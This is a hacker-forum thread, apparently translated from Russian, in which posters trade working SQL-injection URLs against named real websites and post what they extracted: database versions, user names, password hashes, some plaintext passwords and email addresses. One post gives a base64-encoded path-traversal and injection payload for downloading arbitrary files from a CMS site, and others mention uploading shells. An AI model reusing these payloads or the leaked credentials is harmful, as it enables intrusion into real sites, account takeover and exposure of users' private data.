SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. .Begemot.

    GTA.com
    HTML:
    ttp://www.gta.com/support/showReleaseNote/?id=-15+union+select+concat(USER(),0x3a,VERSION(),0x3a,DATABASE())/*
    root@localhost:4.0.12-log:gta
    HTML:
    http://www.gta.com/support/showReleaseNote/?id=-15+union+select+concat(user,0x3a,password)+from+mysql.user/*
    HTML:
    http://www.gta.com/support/showReleaseNote/?id=-15+union+select+concat(user,0x3a,password)+from+mysql.user+limit+2,10/*
    jmontilla:12107ef60046dd4c
     
    5 people like this.
  2. Sleep

    Code:
    http://www.mamochka.org/modules.php?name=Top&querylang=union+select+1,TABLE_NAME,3,4+from+INFORMATION_SCHEMA.TABLES/*
     
    2 people like this.
  3. BizzyD

    Code:
    http://simplymichigan.com/blog/index.php?cat_id=99999+union+select+1,2,3,4,concat_ws(0x3a,user_name,password),6,7,8,9,10,11,12+from+users/*
    michi18_michigan@localhost:michi18_michigan:4.1.22-standard

    Code:
    http://www.absolutemusic.co.uk/shop/index.php?cat_id=99999+union+select+1,2,3,4,5,6,7,8,9,10/*
    absolute@localhost:absolute_:4.1.21-standard-log
     
    2 people like this.
  4. Saint-Sky

    SHOP discountcycleshop.co.uk


    ddbuser1@localhost:4.1.22:discountdb
     
    1 person likes this.
  5. BizzyD

    Code:
    http://gp.by/index.php?mode=cat&cat_id=99999+union+select+1,2,3,4,5,6,7+from+admin/*
     
  6. ElteRUS

    http://www.photosale.ru/index.php?page=-1+union+select+concat_ws(0x2F,version(),database(),user())/*

    5.0.45-log/u41000/[email protected]

    -----------------------------------------------------------------------------

    biorust.com


    http://www.biorust.com/index.php?page=tutorial_detail&tutid=-1'+union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8,9,10,11,12/*

    5.0.22/biorust_com/biorust@localhost


    http://www.biorust.com/index.php?page=tutorial_detail&tutid=-1'+union+select+1,concat_ws(0x2F,admin_name,admin_password),3,4,5,6,7,8,9,10,11,12+from+biorust_com.linkbase_admins+limit+0,1/*

    name/hash
    Scrowler/4c2e348299295d7b87fa02fd14d89c7b


    http://www.biorust.com/index.php?page=tutorial_detail&tutid=-1'+union+select+1,2,3,4,concat_ws(0x2F,username,password,email,icq),6,7,8,9,10,11,12+from+biorust_forums.user+limit+41000,1/*

    login/hash/mail/UIN
    premutos/35a8e932251deca43174675add295437/[email protected]/
     
    10 people like this.
  7. Велемир

    http://grate.ru/index.php?cat_id=13'+union+select+0,1,2,3,4,5,conc at(version(),0x3a,user(),0x3a,database()),7,8,9,10 ,11,12,13,14,15/*

    No access to the schema :PP

    http://topofgames.com/index.php?cat_id=72'

    I substituted some value, I don't remember which, and it printed an error. The quote is filtered. In its place there is a bunch of backslashes :PP

    http://www.dotfiles.com/index.php?cat_id=-6+order+by+1/*

    There is a hole, but no idea how to get around it :PP


    http://www.nlstar.com/catalog/index.php?cat_id=17'+union+select+1,2,3/*

    It doesn't work any further :P
     
    2 people like this.
  8. nex0

    mega.km.ru
    Code:
    http://mega.km.ru/ojigov/encyclop.asp?TopicNumber=1+or+1=@@version
    @@version Microsoft SQL Server 2000 - 8.00.2039 (Intel IA-64) May 3 2005 23:34:52 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 1)
    db_name() ojigov
    system_user mega_link


    via
    Code:
    http://mega.km.ru/ojigov/encyclop.asp?TopicNumber=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('dtproperties'))--
    I found the tables:
    dtproperties
    Rubr
    RubrLinksStat
    Search
    Stat
    StatOrder
    sysconstraints
    syssegments

    but I didn't find any interesting columns in them =/
    P.S. I know MSSQL very poorly, this is actually my first MSSQL injection, so don't judge too harshly; I did everything according to the article by [ cash ]

    sosna1.ru
    version() 5.0.45-log
    user() [email protected]
    database() u71952
    Code:
    http://sosna1.ru/info.php?infoid=19999+union+select+1,2,3,concat(version(),0x3a,user(),0x3a,database()),5,6,7,8,9,10,11/*
    ethanol.org
    version() 4.1.15
    user() ETHANOL@LOCALHOST
    database() ETHANOLDB

    djbattle.net
    version() 4.1.12
    user() djbattle@localhost
    database() djbattle
    Code:
    http://www.djbattle.net/tv.php?tvID=99999+union+select+1,2,3,convert(concat(version(),0x3a,user(),0x3a,database()),binary),5,6,7,8,9,10,11/*
    I found the users table.
    Code:
    http://www.djbattle.net/tv.php?tvID=99999+union+select+111,2,333,convert(concat(min(id),0x3a,user,0x3a,pass,0x3a,mail),binary),5,6,7,8,9,10,11+from+users/*
    id:user:pass:mail
    3:tobbe:1skills2:[email protected]
    apparently he is the admin
     
    #4748 nex0, 12 Feb 2008
    Last edited: 12 Feb 2008
    4 people like this.
  9. ~EviL~

    To Велемир

    Don't be slow =\

    HTML:
    http://www.dotfiles.com/index.php?cat_id=6+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database())/*
    HTML:
    http://www.nlstar.com/catalog/index.php?cat_id=17'+UNION+SELECT+1,2,concat_ws(0x3a,version(),user(),database())/*
    http://www.mosenergo.ru/

    HTML:
    http://www.mosenergo.ru/eng/index.php?id=226&news_id=-1055+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),user(),database()),5+FROM+information_schema.tables/*&theme=56&sessid=4a
    5.0.45-log:site@zvm5
     
    #4749 ~EviL~, 12 Feb 2008
    Last edited: 12 Feb 2008
    2 people like this.
  10. Vallez

    xcedz

    -1+union+select+1,TABLE_NAME,3,4+FROM+INFORMATION_S CHEMA.TABLES+LIMIT+1,1--

    doesn't work.
     
  11. it's my

    Code:
    http://www.job.khit.info/index.php?option=com_job&task=showMoreUser&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(username,0x3a,password),17,18,19,20,21,22,23,24,25+from+kew_users/*
    http://www.job.khit.info/administrator/
    admin:40b5bf20806a044392ea48bc5c436262

    SQL injection in the Joomla/Mambo Component Job (com_job); I found it, but I did not find any other sites with this injection.

    more tables on this domain (other engines)
    Code:
    http://www.job.khit.info/index.php?option=com_job&task=showMoreUser&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,table_name,17,18,19,20,21,22,23,24,25+from+information_schema.tables/*
     
    1 person likes this.
  12. satana8920

    P.S. Starting the morning exercises =)))
     
    4 people like this.
  13. it's my

    Mambo Component Events SQL Injection
    Code:
    http://www.nwen.org/index.php?option=com_events&Itemid=15&id=-1+union+select+concat(username,0x3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+mos_users/*
    http://www.nwen.org/administrator/
    admin;admin

    Found by me. There are many sites with this component, but on most of them, for some reason, nothing is passed in the id parameter, which is the vulnerable one =/
     
    #4753 it's my, 13 Feb 2008
    Last edited: 13 Feb 2008
    1 person likes this.
  14. MaSter GeN

    http://www.kompak.ru:8100/new/news/new.php?num=-342+union+select+1,2,3,4,5,6,7/*
    dbname = www
    dbuser =www@localhost
    dbversion =4.0.20
     
    2 people like this.
  15. db_reader

    www.uselessjunk.com PR4

    version: 5.0.26-Debian_2-log
    database: uselessj_uj2006
    user: uselessj_ohshitw@localhost



    Using limit, we output all the admins.


    www.uselessjunk.com/admin.php - the admin panel.
    There is a forum, on a dedicated server.

    But the extracted data did not work anywhere, and I never managed to connect to the FTP. Uploading a shell did not work either.
    :(
     
    3 people like this.
  16. BizzyD

    Code:
    http://www.novostroy.ru/law/direct.php?num=1056437&id=99999+union+select+1,2,3/*
    wwwnov@localhost:law:4.0.27-1-log




    Code:
    http://www.wholehealthexpo.com/information.php?infoid=99999+union+select+1,2,3,4,5,6/*
    [email protected]:dbheal:4.0.27-max-log


    Code:
    http://www.plenki.net/shipping.php?infoID=99999+union+select+1,2,3/*
    [email protected]:u10744:5.0.45-log

    Code:
    http://www.betonmaster.ru/index.php?view_info=yes&infoID=99999+union+select+1,2,3,4/*
    zrim@localhost:betonmaster:4.1.22-log






    Code:
    http://www.djbattle.net/tv.php?tvID=99999+union+select+1,2,3,concat_ws(0x3a,user,PASS),5,6,7,8,9,10,11+from+users+limit+0,1/*
    roundcube:583e2e1b2957e824
     
    3 people like this.
  17. Велемир

    http://www.nlstar.com/catalog/index.php?cat_id=17'+union+select+1,2,concat(user,0x3a,password)+from+mysql.user/*

    admin:40e369d51c6bd8e2
    pma_WHy8zYQ73Zhn:1c4230400a8e14af
    horde:234994c1665bd570
    nl_star:270037157a74bbe3
    nl_star_django:2490e08f0895cc0b

    :pPPPPPP
     
    3 people like this.
  18. db_reader

    www.davisvisitor.com

    _http://www.davisvisitor.com/additional.php?id=-2+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5/*

    4.0.16:dvb@localhost:dvb

    I could not guess a single table. If anyone can, please post...
     
    2 people like this.
  19. kair

    go for it
    Tables
    counter
     
    #4759 kair, 13 Feb 2008
    Last edited: 13 Feb 2008
  20. big_BRAT

    http://www.modxcms.com
    The official site of the MODx CMS

    There is an injection and the ability to download any files from the site.
    Example link:
    Code:
    http://www.modxcms.com/assets/snippets/repository/repo_download/download.php?dwnParam=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vaG9tZS9odHRwZC92aG9zdHMvbW9keGNtcy5jb20vaHR0cGRvY3N8MTAzNyBBTkQgMT0xfHJlcG9fZGNvdW50fGluZGV4LnBocHxwYXNzd2Q
    For the injection we pass a base64-encoded string with roughly the following content:
    1|2|repo_dcount|3|blabla.txt
    1. - path to the file
    2. - the parameter vulnerable to SQL injection
    3. - the name of the file we want to download
    example:
    ../../../../../../../../../../../../../../home/httpd/vhosts/modxcms.com/httpdocs|1037 AND 1=(select 1)|repo_dcount|index.php|passwd
    --------------------------------------------------
    I don't claim to be the first, but I found it 30 minutes ago; I wanted to install this CMS for myself....
     
    #4760 big_BRAT, 13 Feb 2008
    Last edited: 13 Feb 2008
    5 people like this.